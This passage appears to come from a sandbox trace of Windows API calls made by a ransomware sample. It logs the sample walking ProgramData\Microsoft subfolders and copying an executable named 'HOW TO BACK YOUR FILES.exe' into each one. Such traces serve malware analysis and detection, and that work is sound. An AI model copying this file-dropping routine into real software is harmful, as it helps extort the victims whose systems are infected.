lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.623] CloseHandle (hObject=0x120) returned 1 [0090.623] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.623] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.623] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Network\\Connections\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c635a60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c635a60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.623] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\NetFramework", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\NetFramework") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\NetFramework" [0090.623] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x335388 | out: hHeap=0x2b0000) returned 1 [0090.623] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a08 | out: hHeap=0x2b0000) returned 1 [0090.623] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\NetFramework") returned 75 [0090.623] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\NetFramework" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\NetFramework") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\NetFramework" [0090.624] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.624] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\NetFramework\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\microsoft\\netframework\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.624] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.624] GetLastError () returned 0x0 [0090.624] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.624] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.624] CloseHandle (hObject=0x120) returned 1 [0090.624] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.624] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.624] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\NetFramework\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x56ac2f60, ftCreationTime.dwHighDateTime=0x1d2e676, ftLastAccessTime.dwLowDateTime=0x4c635a60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c635a60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.625] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\NetFramework\\BreadcrumbStore", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\NetFramework\\BreadcrumbStore") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\NetFramework\\BreadcrumbStore" [0090.625] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f2fc8 | out: hHeap=0x2b0000) returned 1 [0090.625] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a08 | out: hHeap=0x2b0000) returned 1 [0090.625] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\NetFramework\\BreadcrumbStore") returned 91 [0090.625] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\NetFramework\\BreadcrumbStore" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\NetFramework\\BreadcrumbStore") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\NetFramework\\BreadcrumbStore" [0090.625] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.625] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\NetFramework\\BreadcrumbStore\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\microsoft\\netframework\\breadcrumbstore\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.625] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.626] GetLastError () returned 0x0 [0090.626] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.626] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.626] CloseHandle (hObject=0x120) returned 1 [0090.626] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.626] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.626] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\NetFramework\\BreadcrumbStore\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x56ac2f60, ftCreationTime.dwHighDateTime=0x1d2e676, ftLastAccessTime.dwLowDateTime=0x4c635a60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c635a60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.626] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\MSDN", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\MSDN") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\MSDN" [0090.626] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9d00 | out: hHeap=0x2b0000) returned 1 [0090.626] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e79e8 | out: hHeap=0x2b0000) returned 1 [0090.626] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\MSDN") returned 67 [0090.626] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\MSDN" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\MSDN") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\MSDN" [0090.626] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.626] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\MSDN\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\microsoft\\msdn\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.627] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.627] GetLastError () returned 0x0 [0090.627] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.627] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.627] CloseHandle (hObject=0x120) returned 1 [0090.627] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.627] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.627] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\MSDN\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50ea0e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x4c635a60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c635a60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.628] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\MSDN\\8.0", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\MSDN\\8.0") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\MSDN\\8.0" [0090.628] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x321190 | out: hHeap=0x2b0000) returned 1 [0090.628] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e79e8 | out: hHeap=0x2b0000) returned 1 [0090.628] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\MSDN\\8.0") returned 71 [0090.628] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\MSDN\\8.0" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\MSDN\\8.0") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\MSDN\\8.0" [0090.628] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.628] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\MSDN\\8.0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\microsoft\\msdn\\8.0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.628] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.628] GetLastError () returned 0x0 [0090.628] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.629] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.629] CloseHandle (hObject=0x120) returned 1 [0090.629] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.629] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.629] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\MSDN\\8.0\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50ea0e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x4c65bbc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c65bbc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.629] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\MF", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\MF") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\MF" [0090.629] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9eb0 | out: hHeap=0x2b0000) returned 1 [0090.629] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7788 | out: hHeap=0x2b0000) returned 1 [0090.629] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\MF") returned 65 [0090.629] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\MF" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\MF") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\MF" [0090.629] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.629] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\MF\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\microsoft\\mf\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.630] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.630] GetLastError () returned 0x0 [0090.630] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.630] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.630] CloseHandle (hObject=0x120) returned 1 [0090.630] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.630] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.630] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\MF\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x669bffe0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x669bffe0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.631] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Media Player", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Media Player") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Media Player" [0090.631] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3352e8 | out: hHeap=0x2b0000) returned 1 [0090.631] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e77c8 | out: hHeap=0x2b0000) returned 1 [0090.631] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Media Player") returned 75 [0090.631] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Media Player" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Media Player") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Media Player" [0090.631] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.631] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Media Player\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\microsoft\\media player\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.631] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.632] GetLastError () returned 0x0 [0090.632] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.632] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.632] CloseHandle (hObject=0x120) returned 1 [0090.632] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.632] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.632] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Media Player\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3ee349fc, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x4c65bbc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c65bbc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.632] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\IdentityCRL", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\IdentityCRL") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\IdentityCRL" [0090.632] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x335248 | out: hHeap=0x2b0000) returned 1 [0090.632] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7808 | out: hHeap=0x2b0000) returned 1 [0090.632] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\IdentityCRL") returned 74 [0090.632] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\IdentityCRL" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\IdentityCRL") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\IdentityCRL" [0090.632] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.632] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\IdentityCRL\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\microsoft\\identitycrl\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.633] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.633] GetLastError () returned 0x0 [0090.633] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.633] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.633] CloseHandle (hObject=0x120) returned 1 [0090.633] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.633] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.633] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\IdentityCRL\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x66a32400, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x66a32400, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.633] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Event Viewer", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Event Viewer") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Event Viewer" [0090.633] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3351a8 | out: hHeap=0x2b0000) returned 1 [0090.633] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c28 | out: hHeap=0x2b0000) returned 1 [0090.633] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Event Viewer") returned 75 [0090.633] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Event Viewer" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Event Viewer") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Event Viewer" [0090.634] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.634] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Event Viewer\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\microsoft\\event viewer\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.634] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.634] GetLastError () returned 0x0 [0090.634] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.634] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.634] CloseHandle (hObject=0x120) returned 1 [0090.634] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.634] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.635] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Event Viewer\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3235c810, ftCreationTime.dwHighDateTime=0x1d2fa9b, ftLastAccessTime.dwLowDateTime=0x4c6cdfe0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c6cdfe0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.635] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Event Viewer\\Views", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Event Viewer\\Views") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Event Viewer\\Views" [0090.635] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e2710 | out: hHeap=0x2b0000) returned 1 [0090.635] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c28 | out: hHeap=0x2b0000) returned 1 [0090.635] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Event Viewer\\Views") returned 81 [0090.635] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Event Viewer\\Views" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Event Viewer\\Views") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Event Viewer\\Views" [0090.635] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" 